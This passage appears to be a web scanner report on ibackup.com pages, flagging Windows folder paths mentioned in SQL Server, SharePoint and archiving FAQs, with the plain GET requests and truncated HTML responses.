class="rel_link">Exchange                    Server Backup</a></li>                 <li><a href="faq_oracle.htm" class="rel_link">Oracle                    Server Backup</a></li>                 <li><a href="faqsharepoint.htm" class="rel_link">SharePoint Server Backup</a></li>                 <li><a href="faqqssb.htm" class="rel_link">System                    State Backup</a></li>                <li><a href="faqqrsync.htm" class="rel_link">IBackup                    for Linux<br />                   (Command Line Interface)</a></li>               </ul>               <br />               <br />               <span class="faq_head"><a href="faqq2.htm" class="faq_head">Online Storage</a></span>               <ul class="listbullet">                 <li><a href="faqq2.htm" class="rel_link">IBackup Drive</a></li>                 <li><a href="faqq8n.htm" class="rel_link">IBackup Drive                    for Mac</a></li>               </ul>               <br />               <br />               <span class="faq_head"><a href="faq_webacc.htm" class="faq_head">Web Interface</a></span><b>(Web-Manager)</b>               <ul class="listbullet">                 <li><a href="faq_webacc.htm" class="rel_link">File/Folder Management</a></li>                 <li><a href="faq_webfold.htm" class="rel_link">WebFolders</a></li>                 <li><a href="faq_share.htm" class="rel_link">Share</a></li>                 <li><a href="faq_subac.htm" class="rel_link">Sub-Accounts</a></li>                 <li><a href="faq_acct.htm" class="rel_link">Account Maintenance</a></li>                 <li><a href="faq_report.htm" class="rel_link">Reports</a></li>                 <li><a href="faq_managebkpset.htm" class="rel_link">Web Based Backup<br /> Management</a></li>               </ul>               <br />               <a href="faqq_vista.htm" class="faq_head"><br /> Guideline FAQs</a>               <ul class="listbullet">                 <li><a href="faqq_vista.htm" class="rel_link">Windows 7 and Vista</a></li>               </ul>               <br />               <br />               <span class="faq_head"><a href="fwl_ibwin.htm" class="faq_head">Firewall Guidance</a></span>               <ul class="listbullet">                 <li><a href="fwl_ibwin.htm" class="rel_link">IBackup                    for Windows</a></li>                 <li><a href="fwl_ibmac.htm" class="rel_link">IBackup                    for Mac</a></li>                 <li><a href="fwl_ibdrive.htm" class="rel_link">IBackup Drive</a></li>               </ul>               <br />               <br />                <span class="faq_head"><a href="faqq94.htm" class="faq_head">Security</a></span>  <ul class="listbullet">                 <li><a href="faqq94.htm" class="rel_link">Security                    and Encryption</a></li>               </ul><br /> <br /> <span class="faq_head"><a href="faqq96.htm" class="faq_head">Plans</a></span>               <ul class="listbullet">                 <li><a href="faqq96.htm" class="rel_link">Subscription                    Plans</a></li>                 <li><a href="faqq1.htm" class="rel_link">How                    do I decide which IBackup feature to use with my IBackup account?</a></li>                 <li><a href="faqq92.htm" class="rel_link">Free                    Trial</a></li>                 <li><a href="faqq97.htm" class="rel_link">Credit                    card Issues</a><br /> <br /></ul> <span class="faq_head"><a href="faqq98.htm" class="faq_head">Miscellaneous</a></span></span><br />   <br /> <br />           </div></td>           <td width="25" class="faq_split"> </td>           <td width="660" valign="top" class="txtcontent"><table WIDTH="100%" border="0" cellspacing="0" cellpadding="0">               <tr>                 <td width="5"> </td>                 <td><span class="lnkmore">IBackup For Windows</span>                   <hr />                   <br />                   <table width="100%" border="0" cellspacing="2" cellpadding="4">                     <tr>                       <td colspan="2"><span class="lnktxt">General</span><a name="gen"></a></td>                     </tr>                     <tr>                       <td width="12"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td width="530"><a href="#1" class="linkbodygray">What is IBackup for Windows?</a></td>                     </tr>                     <tr>                       <td><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td><a href="#2" class="linkbodygray">Does IBackup for Windows use Delta Blocking technology?</a></td>                     </tr>                     <tr>                       <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td><a href="#3" class="linkbodygray">Does IBackup for Windows support my native character set?</a></td>                     </tr>                     <tr>                       <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td><a href="#7" class="linkbodygray">What is the ideal solution for online backup of several hundred gigabytes of data?</a></td>                     </tr>                     <tr>                       <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" vspace="3" /></td>                       <td><div align="justify"><a href="#8" class="linkbodygray">My initial backup was done via a shipped hard disk. But when I backup my data using the application, it seems to be backing up my files and folders all over again. Why?</a></div></td>                     </tr>                     <tr>                       <td><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td><a href="#dtedisp" class="linkbodygray">How are the dates of backed up files displayed                          in IBackup for Windows? </a></td>                     </tr>                     <tr>                       <td><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td><a href="#qcbook" class="linkbodygray">How do I                          use IBackup to schedule backups for Quickbooks data? </a></td>                     </tr>                     <tr>                       <td> </td>                       <td> </td>                     </tr>                   </table>                   <table width="100%" border="0" cellspacing="2" cellpadding="4">                     <tr>                       <td colspan="2"><span class="lnktxt">Quota</span><a name="quo"></a></td>                     </tr>                     <tr>                       <td width="12"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td><a href="#4" class="linkbodygray">If I keep on performing backups, will I use up my quota quickly? </a></td>                     </tr>                     <tr>                       <td><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td><a href="#5" class="linkbodygray">I received a quota overuse email. What should I do? </a></td>                     </tr>                     <tr>                       <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" vspace="3" /></td>                       <td><div align="justify"><a href="#6" class="linkbodygray">I have deleted some unwanted files/folders from my IBackup account. However, the 'Quota used' does not change. How do I know the exact quota used?</a></div></td>                     </tr>                   </table>                   <table width="100%" border="0" cellspacing="2" cellpadding="4">                     <tr>         ..
		 
		
		
		
			
				
					
						- /online-backup-faq/faqqsql.htm
						
					 
				 
			
			
			
			
			
			
				C:\Program Files\Microsoft SQL Server\80
			Request 
			GET /online-backup-faq/faqqsql.htm HTTP/1.1 Referer: http://www.ibackup.com/online-backup-resources/index.html User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 200 OK Date: Fri, 24 Jun 2011 01:53:03 GMT Server: Apache Last-Modified: Thu, 26 May 2011 05:35:43 GMT ETag: "35029b-a8b4-4ddde6af" Accept-Ranges: bytes Content-Length: 43188 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>FAQ - SQL Server Backup</title> <link rel="stylesheet"  href="../includes/obk_style.css" type="text/css"> <script language="JavaScript" src="../includes/obk_AC_RunActiveContent.js"></script> <script language="JavaScript" src="../includes/obk_mm_menu.js"></script> <script language="JavaScript" src="../includes/obk_pmenu.js"></script> <script language="JavaScript" src="../includes/obk_dropDown.js"></script> <link rel="icon" href="/images/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon"  /> </head> <body> <script language="JavaScript1.2" type="text/javascript">mmLoadMenus();</script> <table width="100%" border="0" cellspacing="0" cellpadding="0">   <tr>     <td background="../images/obk_topbg.jpg"><table width="960"  border="0" align="center" cellpadding="0" cellspacing="0">         <tr>           <td width="160"><a href="../index.html"><img src="../images/obk_logo.jpg" alt="IBackup - online backup and online storage" width="159" height="105" border="0" /></a></td>           <td align="right" valign="top"><a  href="../feedback_new.htm"><img src="../images/obk_hd_support.jpg"  alt="Support" width="161" height="50" border="0" /></a></td>         </tr>       </table></td>   </tr> </table> <table width="100%" background="../images/obk_bacwin_bg.jpg" border="0" cellpadding="0" cellspacing="0">   <tr>     <td><img src="../images/obk_spacer.gif" width="2" height="9" /><br />       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0" id="main_menu">         <tr>           <td id="mn_home"><a href="/index.html"><img src="../images/obk_spacer.gif" alt="Home" width="46" height="40" border="0" /></a></td>           <td id="mn_sign"><a href="/qmanager/jsp/regterms_new.jsp"><img src="../images/obk_spacer.gif" alt="Sign up" width="108" height="40" border="0" /></a></td>           <td id="mn_price"><a href="/charginghelp_new.htm"><img src="../images/obk_spacer.gif" alt="Pricing Plans" width="141" height="40" border="0" /></a></td>           <td id="mn_prod"><a href="#"><img src="../images/obk_spacer.gif" alt="Products" width="112" height="40" border="0"  name="products" onmouseover="MM_showMenu(window.mm_menu_0313114926_0,0,40,null,'products');" onmouseout="MM_startTimeout()" /></a></td>           <td id="mn_down"><a href="/online-backup-downloads"><img src="../images/obk_spacer.gif" alt="Downloads" width="131" height="40" border="0" /></a></td>           <td id="mn_secur"><a href="/online-backup-security"><img src="../images/obk_spacer.gif" alt="Security" width="106" height="40" border="0" /></a></td>           <td id="mn_supp"><a href="/feedback_new.htm"><img src="../images/obk_spacer.gif" alt="Support" width="109" height="40" border="0" /></a></td>           <td id="mn_part"><a href="/online-backup-partners"><img src="../images/obk_spacer.gif" alt="Partners" width="109" height="40" border="0" /></a></td>           <td id="mn_faq"><a href="/online-backup-faq"><img src="../images/obk_spacer.gif" alt="FAQs" width="98" height="40" border="0" /></a></td>         </tr>       </table>       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">         <tr>           <td background="../images/obk_banr_confirm.jpg" valign="top" class="backwin_confirm_banner"><table width="100%" border="0" cellspacing="0" cellpadding="0">               <tr>                 <td><h1>Frequently Asked Questions<a name="top" id="top"></a></h1></td>               </tr>             </table></td>         </tr>       </table></td>   </tr> </table> <table width="100%" border="0" cellpadding="0" cellspacing="0">   <tr>     <td background="../images/obk_subpag_bg.jpg" style="background-repeat:repeat-x;"><img src="../images/obk_spacer.gif" width="2" height="45" /><br />       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">         <tr>           <td valign="top" width="200"><div id="faq_list"> <span class="faq_head"><a href="index.html" class="faq_head">Online Backup</a></span>             <ul class="listbullet">               <li><a href="index.html" class="rel_link">IBackup                  for Windows</a></li>               <li><a href="faqq_ibackup_mac.htm" class="rel_link">IBackup                  for Mac </a></li>               <li><a href="ibackup-for-iphone-faq.htm" class="rel_link">IBackup                  for iPhone </a></li>               <li><a href="faqq6n.htm" class="rel_link">Snapshots</a></li>               <li><a href="faqqsql.htm" class="rel_link">SQL      Server Backup</a></li>               <li><a href="faqq93a.htm" class="rel_link">Exchange                  Server Backup</a></li>               <li><a href="faq_oracle.htm" class="rel_link">Oracle                  Server Backup</a></li>               <li><a href="faqsharepoint.htm" class="rel_link">SharePoint Server Backup</a></li>               <li><a href="faqqssb.htm" class="rel_link">System                  State Backup</a></li>               <li><a href="faqqrsync.htm" class="rel_link">IBackup                  for Linux<br />                 (Command Line Interface)</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="faqq2.htm" class="faq_head">Online Storage</a></span>             <ul class="listbullet">               <li><a href="faqq2.htm" class="rel_link">IBackup Drive</a></li>               <li><a href="faqq8n.htm" class="rel_link">IBackup Drive                  for Mac</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="faq_webacc.htm" class="faq_head">Web Interface</a></span><b>(Web-Manager)</b>             <ul class="listbullet">               <li><a href="faq_webacc.htm" class="rel_link">File/Folder Management</a></li>               <li><a href="faq_webfold.htm" class="rel_link">WebFolders</a></li>               <li><a href="faq_share.htm" class="rel_link">Share</a></li>               <li><a href="faq_subac.htm" class="rel_link">Sub-Accounts</a></li>               <li><a href="faq_acct.htm" class="rel_link">Account Maintenance</a></li>               <li><a href="faq_report.htm" class="rel_link">Reports</a></li>               <li><a href="faq_managebkpset.htm" class="rel_link">Web Based Backup<br />                 Management</a></li>             </ul>             <br />             <a href="faqq_vista.htm" class="faq_head"><br />               Guideline FAQs</a>             <ul class="listbullet">               <li><a href="faqq_vista.htm" class="rel_link">Windows 7 and Vista</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="fwl_ibwin.htm" class="faq_head">Firewall Guidance</a></span>             <ul class="listbullet">               <li><a href="fwl_ibwin.htm" class="rel_link">IBackup                  for Windows</a></li>               <li><a href="fwl_ibmac.htm" class="rel_link">IBackup                  for Mac</a></li>               <li><a href="fwl_ibdrive.htm" class="rel_link">IBackup Drive</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="faqq94.htm" class="faq_head">Security</a></span>             <ul class="listbullet">               <li><a href="faqq94.htm" class="rel_link">Security                  and Encryption</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="faqq96.htm" class="faq_head">Plans</a></span>             <ul class="listbullet">               <li><a href="faqq96.htm" class="rel_link">Subscription                  Plans</a></li>               <li><a href="faqq1.htm" class="rel_link">How                  do I decide which IBackup feature to use with my IBackup account?</a></li>               <li><a href="faqq92.htm" class="rel_link">Free                  Trial</a></li>               <li><a href="faqq97.htm" class="rel_link">Credit                  card Issues</a><br />                 <br />               </li>             </ul>             <span class="faq_head"><a href="faqq98.htm" class="faq_head">Miscellaneous</a></span><br />             <br />             <br />           </div></td>           <td width="25" class="faq_split"> </td>           <td width="680" valign="top" class="txtcontent"><TABLE WIDTH="100%" BORDER="0" CELLPADDING="0" CELLSPACING="0" class="txtcontent">               <TR>                 <TD valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0">                     <tr>                       <td width="5"> </td>                       <td class="linkbodygray"><span class="lnkmore">SQL Server Backup</span>                         <hr />                         <br />                         <table width="100%" border="0" cellspacing="2" cellpadding="4">                           <tr>                             <td width="12"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                             <td><a href="#37" class="linkbodygray">How do I backup my MS SQL Server?</a></td>                           </tr>                           <tr>                             <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                             <td><a href="#38" class="linkbodygray">Under what name and extension are the MS SQL Server backup files stored on IBackup?</a></td>                           </tr>                           <tr>                             <td><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                             <td><a href="#39" class="linkbodygray">Can I backup databases from multiple                                instances of the MS SQL Server?</a></td>                           </tr>                           <tr>                             <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                             <td><a href="#40a" class="linkbodygray">I am not able to view the databases                                in the instance of MS SQL Server I am logged into. Why?</a></td>                           </tr>                           <tr>                             <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                             <td><a href="#42a" class="linkbodygray">Can I backup the MS SQL Server in the  'Mirror Path' mode?</a></td>                           </tr>                           <tr>                             <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                             <td><a href="#43" class="linkbodygray">Can I backup the MS SQL Server 'tempdb'                                database?</a></td>                           </tr>                           <tr>                             <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                             <td><a href="#44" class="linkbodygray">How do I restore my database backup file (*.dmp) to my MS SQL Server?</a></td>                           </tr>                           <tr>                             <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                             <td><a href="#45" class="linkbodygray">Can IBackup for Windows backup the                                entire SQL Server database?</a></td>                           </tr>                           <tr>                             <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                             <td><a href="#restrdtb" class="linkbodygray">Can I restore my database file to a different MS SQL Server database?</a></td>                           </tr>                           <tr>                             <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                             <td><a href="#46" class="linkbodygray">Under what circumstance should I restore the MS SQL Server 'master' database?</a></td>                           </tr>                           <tr>                             <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                             <td><a href="#47" class="linkbodygray">How do I restore the MS SQL Server                                'master' database?</a></td>                           </tr>                           <tr>                             <td valign="top"><img src=&quo..
		 
		
		
		
			
				
					
						- /flexible_archiving.htm
						
					 
				 
			
			
			
			
			
			
				c:\quickbooks data
			Request 
			GET /flexible_archiving.htm HTTP/1.1 Referer: http://www.ibackup.com/ibackup_advantage.htm User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 200 OK Date: Fri, 24 Jun 2011 01:53:24 GMT Server: Apache Last-Modified: Thu, 10 Jun 2010 07:09:33 GMT ETag: "10c71f-329f-4c108fad" Accept-Ranges: bytes Content-Length: 12959 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Create your own flexible, multi-year archive solution to backup data for future use</title> <link rel="stylesheet"  href="includes/obk_style.css" type="text/css"> <script language="JavaScript" src="includes/obk_AC_RunActiveContent.js"></script> <script language="JavaScript" src="includes/obk_mm_menu.js"></script> <script language="JavaScript" src="includes/obk_pmenu.js"></script> <script language="JavaScript" src="includes/obk_dropDown.js"></script> <link rel="icon" href="/images/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon"  /> </head> <body> <script language="JavaScript1.2" type="text/javascript">mmLoadMenus();</script> <table width="100%" border="0" cellspacing="0" cellpadding="0">   <tr> <td background="images/obk_topbg.jpg"><table width="960"  border="0" align="center" cellpadding="0" cellspacing="0">       <tr>         <td width="160"><a href="../index.html"><img  src="images/obk_logo.jpg" alt="IBackup - online backup and online  storage" width="159" height="105" border="0" /></a></td>         <td align="right" valign="top"><a  href="../feedback_new.htm"><img src="images/obk_hd_support.jpg"  alt="Support" width="161" height="50" border="0" /></a></td>       </tr>     </table></td>   </tr> </table> <table width="100%" background="images/obk_bacwin_bg.jpg" border="0" cellpadding="0" cellspacing="0"><tr><td> 	<img src="images/obk_spacer.gif" width="2" height="9" /><br />     <table width="960" border="0" align="center" cellpadding="0" cellspacing="0" id="main_menu">       <tr>         <td id="mn_home"><a href="../index.html"><img src="images/obk_spacer.gif" alt="Home" width="46" height="40" border="0" /></a></td>         <td id="mn_sign"><a href="../qmanager/jsp/regterms_new.jsp"><img src="images/obk_spacer.gif" alt="Sign up" width="108" height="40" border="0" /></a></td>         <td id="mn_price"><a href="../charginghelp_new.htm"><img src="images/obk_spacer.gif" alt="Pricing Plans" width="141" height="40" border="0" /></a></td>         <td id="mn_prod"><a href="#"><img src="images/obk_spacer.gif" alt="Products" width="112" height="40" border="0"  name="products" onmouseover="MM_showMenu(window.mm_menu_0313114926_0,0,40,null,'products');" onmouseout="MM_startTimeout()" /></a></td>         <td id="mn_down"><a href="../online-backup-downloads/"><img src="images/obk_spacer.gif" alt="Downloads" width="131" height="40" border="0" /></a></td>         <td id="mn_secur"><a href="../online-backup-security/"><img src="images/obk_spacer.gif" alt="Security" width="106" height="40" border="0" /></a></td>         <td id="mn_supp"><a href="../feedback_new.htm"><img src="images/obk_spacer.gif" alt="Support" width="109" height="40" border="0" /></a></td>         <td id="mn_part"><a href="../online-backup-partners/"><img src="images/obk_spacer.gif" alt="Partners" width="109" height="40" border="0" /></a></td>         <td id="mn_faq"><a href="../online-backup-faq/"><img src="images/obk_spacer.gif" alt="FAQs" width="98" height="40" border="0" /></a></td>       </tr>     </table>     <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">   <tr><td background="images/obk_banr_flexiblearchiving.jpg" valign="top" class="backwin_inside_banner">     <table width="100%" border="0" cellspacing="0" cellpadding="0">         <tr>           <td><h1 class="banner_txt1">Backup Microsoft SQL Server</h1></td>           </tr>           <tr><td class="banner_txt"><img src="images/obk_spacer.gif" width="2" height="3" /><br />            Create your own flexible, multi-year archive solution to backup data            for future use</td></tr>           <tr>            <td class="banner_txt"> </td>           </tr>         </table>     </td>   </tr> </table> </td></tr></table> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr><td background="images/obk_bacwin_bg2.jpg" style="background-repeat:repeat-x;"> <img src="images/obk_spacer.gif" width="2" height="50" /><br />     <table width="900" border="0" align="center" cellpadding="0" cellspacing="0">       <tr>         <td valign="top" width="545">         <p>A simple process of renaming a top level folder meaningfully lets          you customize your own archive solution, allowing historical view of          data over a period of time. <br />          <br />          For example: Let us assume that data from the computer name 'FINANCIAL-COMPUTER'          is backed up to your IBackup account and this is the file/folder hierarchy:<br />          <br />          <img src="images/fex_arch_scr.jpg" width="310" height="226" /></p></td>         <td width="50"> </td>         <td valign="top" width="305" background="images/obk_inside_tab.jpg" class="back_tab"><br /><br /><br />     <table width="86%" border="0" align="center" cellpadding="5" cellspacing="0">         <tr>           <td colspan="2"><img src="images/obk_rellink.jpg" alt="Related Link" width="104" height="15" border="0" /></td>         </tr>         <tr>           <td><img src="images/obk_spacer.gif" width="4" height="1" /></td>           <td><img src="images/obk_spacer.gif" width="4" height="1" /></td>         </tr>         <tr>           <td width="12%" align="center"><img src="images/obk_bullet1.jpg" width="13" height="12" /></td>           <td><a href="data_sheets.htm" class="rel_link">Product data sheet</a></td>         </tr>         <tr>           <td width="12%" align="center"><img src="images/obk_bullet1.jpg" width="13" height="12" /></td>           <td><span class="txtcontent"><a href="datasheets/IBackup_business_solutions.pdf" class="rel_link">Business solutions</a></span></td>         </tr>         </table>         </td>       </tr>     </table></td></tr></table> <table width="900" border="0" align="center" cellpadding="0" cellspacing="0">  <tr>   <td>If you would like to keep an archive of your quickbooks data as of 03/31/2010,    rename your quickbooks folder on the IBackup side as:<br />          <br /> c:\quickbooks data – 03312010<br /> <br /> <span class="note">Note:</span> Renaming your folder is easy. From your IBackup for Windows, right-click the folder you wish to rename and select the 'rename' option from the menu.<br />          <br />          <img src="images/fex_arch_scr1.jpg" width="435" height="320" /><br />          <br /> The next time backup runs, it will create a fresh folder c:\quickbooks data. You can apply this logic to archive, based on any parameter.</td>  </tr> </table> <img src="images/obk_spacer.gif" width="2" height="30" /><img src="images/obk_spacer.gif" width="2" height="30" /><br /> <table width="960" border="0" align="center" cellpadding="0" cellspacing="0"> <tr>  </tr> </table> <img src="images/obk_spacer.gif" width="4" height="5" /><br /> <table id="footer" width="100%" border="0" cellspacing="0"  cellpadding="0" background="images/obk_footer_bg.jpg"  style="background-repeat:repeat-x; background-color:#333333;  background-position:0px 0px">   <tr>     <td><table width="960" border="0" align="center" cellpadding="0"  cellspacing="0">       <tr>         <td width="5"><table width="960" border="0" cellspacing="0"  cellpadding="4">             <tr>               <td colspan="4"><img src="images/obk_spacer.gif"  width="8" height="30" /><br></td>               </tr>             <tr>               <td width="240" class="txtfoothead">My IBackup</td>               <td width="240" class="txtfoothead">Products</td>               <td width="240" class="txtfoothead">Help / Support </td>               <td width="240" class="txtfoothead">Services</td>             </tr>             <tr>               <td valign="top" class="txtfooter"><img  src="images/obk_spacer.gif" width="8" height="5" /></td>               <td valign="top" class="txtfooter"><img  src="images/obk_spacer.gif" width="8" height="5" /></td>               <td valign="top" class="txtfooter"><img  src="images/obk_spacer.gif" width="8" height="5" /></td>               <td valign="top" class="txtfooter"><img  src="images/obk_spacer.gif" width="8" height="5" /></td>             </tr>             <tr>               <td valign="top" class="txtfooter">               	<a href="/qmanager/jsp/regterms_new.jsp"  class="lnkfooter">Signup for an account</a>                 <a href="../charginghelp_new.htm"  class="lnkfooter">View pricing plans</a>                 <a href="../policy_new.htm" class="lnkfooter">Privacy  statement</a>                 <a href="../license/terms_new.htm"  class="lnkfooter">Terms of use</a>                 <a href="../license/licenses.htm"  class="lnkfooter">Licenses</a>                 <a href="../ibackup_advantage.htm"  class="lnkfooter">IBackup Advantage</a>                 <a href="../online-backup-casestudy/testimonials.htm"  class="lnkfooter">Testimonials</a></td>                                <td valign="top" class="txtfooter">               	<a href="../ibackup-for-windows/"  class="lnkfooter">IBackup for Windows</a>                 <a href="../ibackup-for-mac/"  class="lnkfooter">IBackup for Mac</a>                 <a href="../online-storage-drive/"  class="lnkfooter">IBackup Drive</a>                 <a href="../online-storage-mac/"  class="lnkfooter">IBackup Drive for Mac</a>                 <a href="../online-backup-web-manager/"  class="lnkfooter">Web-Manager</a>                 <a href="../online-storage-webfolders/"  class="lnkfooter">WebFolders</a>                 <a href="../online-backup-sql-server/"  class="lnkfooter">SQL Server Backup</a>                 <a href="../online-backup-exchange-server/"  class="lnkfooter">Exchange Server Backup</a>                 <a href="../online-backup-oracle-server/"  class="lnkfooter">Oracle Server Backup</a>                 <a href="../hot-sites/" class="lnkfooter">Hot  Sites</a>                 <a href="../online-backup-linux/"  class="lnkfooter">IBackup for Linux/Unix</a></td>               <td valign="top" class="txtfooter">               	<a href="../online-backup-demo/"  class="lnkfooter">View product demo</a>                 <a href="../online-backup-faq/" class="lnkfooter">Read  the FAQ</a>                 <a href="../online-backup-resources/"  class="lnkfooter">Information library</a>                 <a href="../feedback_new.htm" class="lnkfooter">Send  feedback</a>                 <a href="../online-backup-company/"  class="lnkfooter">About us</a>                 <a  href="../online-backup-company/profile_contact_new.htm"  class="lnkfooter">Contact information</a>                 <a href="../online-backup-news/"  class="lnkfooter">Press releases</a>                 <a href="../online-backup-casestudy/"  class="lnkfooter">Case Studies</a>                 <a href="../sitemap.htm" class="lnkfooter">Site  map</a></td>               <td valign="top" class="txtfooter">               	<a href="../online-backup/" class="lnkfooter">Online  Backup</a>                 <a href="../online-backup-compliance/"  class="lnkfooter"> Business compliance</a>                 <a href="../online-backup-partners/"  class="lnkfooter">Partner with us</a>                 <a href="../ibackup-for-windows/ibackup_snap.htm"  class="lnkfooter">Rapid Serve</a></td>             </tr> 			<tr>               <td colspan="4"><img src="images/obk_spacer.gif"  width="8" height="30" /><br></td>               </tr>         </table></td>         </tr>     </table></td>   </tr> </table> <table id="footer_copy" width="100%" border="0" cellspacing="0"  cellpadding="0" background="images/ib09_footer_bg.jpg"  style="background-repeat:repeat-x; background-color:#b7d0e0;">   <tr>     <td bgcolor="#1a1a1a"><table width="960" border="0" align="center"  cellpadding="2" cellspacing="0">             <tr>               <td width="500" valign="middle"><span class="txtfooter">  Copyright © 1999-2010 Pro Softnet Corporation. All rights  reserved.</span></td> 			<td width="10"><img  src="images/obk_spacer.gif" width="8" height="60" /></td>  ..
		 
		
		
		
			
				
					
						- /online-backup-faq/faqsharepoint.htm
						
					 
				 
			
			
			
			
			
			
				C:\Program Files\Common Files\Microsoft Shared\web server extensions\12
			Request 
			GET /online-backup-faq/faqsharepoint.htm HTTP/1.1 Referer: http://www.ibackup.com/online-backup-faq/index.html User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 200 OK Date: Fri, 24 Jun 2011 01:53:25 GMT Server: Apache Last-Modified: Thu, 26 May 2011 05:35:52 GMT ETag: "350276-63d1-4ddde6b8" Accept-Ranges: bytes Content-Length: 25553 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>FAQ - MS SharePoint Server - Granular backup / restore</title> <link rel="stylesheet"  href="../includes/obk_style.css" type="text/css"> <script language="JavaScript" src="../includes/obk_AC_RunActiveContent.js"></script> <script language="JavaScript" src="../includes/obk_mm_menu.js"></script> <script language="JavaScript" src="../includes/obk_pmenu.js"></script> <script language="JavaScript" src="../includes/obk_dropDown.js"></script> <link rel="icon" href="/images/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon"  /> </head> <body> <script language="JavaScript1.2" type="text/javascript">mmLoadMenus();</script> <table width="100%" border="0" cellspacing="0" cellpadding="0">   <tr>     <td background="../images/obk_topbg.jpg"><table width="960" border="0" align="center" cellpadding="0" cellspacing="0">         <tr>           <td width="160"><a href="../index.html"><img src="../images/obk_logo.jpg" alt="IBackup - online backup and online storage" width="159" height="105" border="0" /></a></td>           <td align="right" valign="top"><a href="../feedback_new.htm"><img src="../images/obk_hd_support.jpg" alt="Support" width="161" height="50" border="0" /></a></td>         </tr>       </table></td>   </tr> </table> <table width="100%" background="../images/obk_bacwin_bg.jpg" border="0" cellpadding="0" cellspacing="0">   <tr>     <td><img src="../images/obk_spacer.gif" width="2" height="9" /><br />       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0" id="main_menu">         <tr>           <td id="mn_home"><a href="/index.html"><img src="../images/obk_spacer.gif" alt="Home" width="46" height="40" border="0" /></a></td>           <td id="mn_sign"><a href="/qmanager/jsp/regterms_new.jsp"><img src="../images/obk_spacer.gif" alt="Sign up" width="108" height="40" border="0" /></a></td>           <td id="mn_price"><a href="/charginghelp_new.htm"><img src="../images/obk_spacer.gif" alt="Pricing Plans" width="141" height="40" border="0" /></a></td>           <td id="mn_prod"><a href="#"><img src="../images/obk_spacer.gif" alt="Products" width="112" height="40" border="0"  name="products" onmouseover="MM_showMenu(window.mm_menu_0313114926_0,0,40,null,'products');" onmouseout="MM_startTimeout()" /></a></td>           <td id="mn_down"><a href="/online-backup-downloads"><img src="../images/obk_spacer.gif" alt="Downloads" width="131" height="40" border="0" /></a></td>           <td id="mn_secur"><a href="/online-backup-security"><img src="../images/obk_spacer.gif" alt="Security" width="106" height="40" border="0" /></a></td>           <td id="mn_supp"><a href="/feedback_new.htm"><img src="../images/obk_spacer.gif" alt="Support" width="109" height="40" border="0" /></a></td>           <td id="mn_part"><a href="/online-backup-partners"><img src="../images/obk_spacer.gif" alt="Partners" width="109" height="40" border="0" /></a></td>           <td id="mn_faq"><a href="/online-backup-faq"><img src="../images/obk_spacer.gif" alt="FAQs" width="98" height="40" border="0" /></a></td>         </tr>       </table>       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">         <tr>           <td background="../images/obk_banr_confirm.jpg" valign="top" class="backwin_confirm_banner"><table width="100%" border="0" cellspacing="0" 